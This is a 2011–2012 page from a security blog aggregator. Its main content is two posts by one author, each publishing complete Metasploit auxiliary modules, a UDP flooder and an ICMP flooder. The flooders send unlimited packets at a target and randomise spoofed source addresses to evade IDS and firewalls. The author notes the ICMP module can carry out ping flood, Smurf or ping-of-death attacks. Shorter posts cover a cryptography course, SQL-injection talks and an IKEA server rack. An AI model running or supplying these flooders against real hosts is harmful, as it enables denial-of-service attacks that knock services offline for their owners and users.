Logo Planet Security

January 17, 2012

Jesús Pérez

My first Metasploit module: UDP Flooder

There are very few Metasploit modules, neither Auxiliaries nor Exploits, VoIP related so I have in mind to write some of them in my free time. Today I want to share a UDP flooder Aux. module, which is very simple but perfect for learning, UDPFlooder is one of the many tools covered in "Hacioking VoIP Exposed" book, considered a reference in this field.

Code:

-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Dos
include Msf::Exploit::Capture

def initialize
super(
'Name' => 'UDP Flooder',
'Description' => 'A simple UDP flooder',
'Author' => 'Jesus Perez',
'License'     => MSF_LICENSE,
'Version' => '$Revision: 0 $'
)

register_options(
[
Opt::RPORT(5060),
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
OptInt.new('NUM', [false, 'Number of UDP packets to send (else unlimited)']),
OptInt.new('SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])
], self.class)
deregister_options('FILTER','PCAPFILE','SNAPLEN')
end

def sport
datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i
end

def rport
datastore['RPORT'].to_i
end

def srchost
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
end

def size
datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
end

def run
open_pcap

sent = 0
num = datastore['NUM']

print_status("UDP flooding #{rhost}:#{rport}...")

p = PacketFu::UDPPacket.new
p.ip_daddr = rhost
p.udp_dport = rport

while (num <= 0) or (sent < num)
p.ip_ttl = rand(128)+128
p.ip_saddr = srchost
p.udp_sport = sport
p.payload = rand(36**size).to_s(36)
p.recalc
capture_sendto(p,rhost)
sent += 1
end

close_pcap
end
end
--------------------------------------------------------------------------

Most of the code is taken from Metasploit TCP SYN Flooder module but I made some more changes besides adapting it to UDP. The same way TTL is changed in each packet, I prefer to change the source (spoofed) address too because of the same reason (IDS/Firewall evasion). Moreover, in this case something to send is needed so I added the new option SIZE which determines the lenght of this random string. Another different thing you could apprecciate is that option SNAPLEN is unregistered too because of having no sense in this module.


Figure: Usage information

Finally, in order to test if module works fine I´m going to sniff the interface and see, with help of Wireshark, what it´s really happening. Next picture shows that everything seems to be working as defined in the description of the attack. :)



Figures: Sniffed packets

Jesús Pérez

posted by Jesús Pérez (noreply@blogger.com) at January 17, 2012 06:55 PM

Another simple Metasploit module: ICMP Flooder


Hi again!, I said I was going to develope VoIP related Metasploit modules but I was reading PacketFu documentation and I found that wrinting an ICMP flooder couldn´t be too complicated at this point. So I share this code too, I decided to include SHOST and SIZE options too trying to get a more flexible module able to make different flavors of this attack as Ping flood, Smurf or Ping of death. Next pictures show the module in  the same way of last post.

Code:

-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Dos
include Msf::Exploit::Capture

def initialize
super(
'Name' => 'ICMP Flooder',
'Description' => 'A simple ICMP flooder',
'Author' => 'Jesus Perez',
'License'     => MSF_LICENSE,
'Version' => '$Revision: 0 $'
)

register_options(
[
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
OptInt.new('NUM', [false, 'Number of ping packets to send (else unlimited)']),
OptInt.new('SIZE', [false, 'Size of ICMP packets to send (else 256 bytes)'])
], self.class)
deregister_options('FILTER','PCAPFILE','SNAPLEN')
end

def srchost
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
end

def size
datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
end

def run
open_pcap

sent = 0
num = datastore['NUM']

print_status("ICMP flooding #{rhost}...")

p = PacketFu::ICMPPacket.new
p.icmp_type = 8
p.icmp_code = 0
p.ip_daddr = rhost

while (num <= 0) or (sent < num)
p.ip_saddr = srchost
p.payload = rand(36**size).to_s(36)
p.recalc
capture_sendto(p,rhost)
sent += 1
end

close_pcap
end
end
-------------------------------------------------------------------------


Figure: Usage information


Figure: Sniffed packets

Jesús Pérez

posted by Jesús Pérez (noreply@blogger.com) at January 17, 2012 06:54 PM

December 15, 2011

Javier Muñoz

Physical Security & Criptography at MSWL 2012

Great time at Master Software Libre teaching Physical Security and Cryptography contents this year. Two key areas at Information Security and Privacy.

These lessons were the first ones happening before my usual lessons on Networking, Security Networking and Linux Kernel.

On Physical Security time we worked on well-know physical system security methodologies, together with two new relevant topics: environmental design and design and evaluation of physical protection systems.

It was a lesson covering broad and detailed topics; ranging from designing defensible spaces, where you are able to use different elements and aspects to get natural social control and crime prevention, till a full description of technology and sensor availability to protect different facilities. Security standards or some notes to understand social behaviour (The Bronx study case) were worked out too.

On Cryptography, we walked along its history and development in order to understand cryptographic models and current crytographic systems, free/open software tooling, integration and usual use cases. At the end, everybody got their crypto stuff in place, ready to take part in keysigning parties and next social community events.

Ah! I almost forgot. This year, students will elaborate on the right design to build a safe and secure physical protection system for one embassy.

posted by javier at December 15, 2011 05:14 PM

November 22, 2011

Jesús Pérez

Some posts on Flu-Project blog


I recently wrote two posts (in Spanish) on Flu-Project blog about my recent experience in Hackmeeting 2011 (MeigHacks) and some of the issues I treated during my lecture, including W3af and SQLMap. These are the links:

- De paso por el Hackmeeting 2011
- Badstore, SQLi y otras chicas del montón


Jesús Pérez

posted by Jesús Pérez (noreply@blogger.com) at November 22, 2011 04:13 PM

November 19, 2011

Carlos López

IKEA Hackers: LackRack

Among the hundreds of hacks from the fantastic website IKEA Hackers, one is particularly interesting.

How to build a rack with an IKEA lack table worth less than 10 euros?
Well, with this manual:

The best of the LackRack (after its price) is that its construction is modular and you can grow it with your needs:

5x LackRack

The LackRack is the ultimate, low-cost, high shininess solution for your modular datacenter-in-the-living-room. It is said that Google engineers were the first to explore the idea of using lack tables for data centers. The LackRack is so famous that even has its own website: http://lackrack.org/ :D

posted by clopez at November 19, 2011 10:30 PM

Logo Planet Security

About

We are a group of friends who decided to share this site in order to write about our points of view, curiosities and worries, always in context of information security.

hacker emblem

note: Subscriptor's opinions are completely personal and don´t represent any collective (including the planet!).


Contact

admin/AT/planetsecurity/DOT/org


Feed

(Atom) Atom



Suscriptions

powered by  PLanetPlanet   /   styled by Carlos Pérez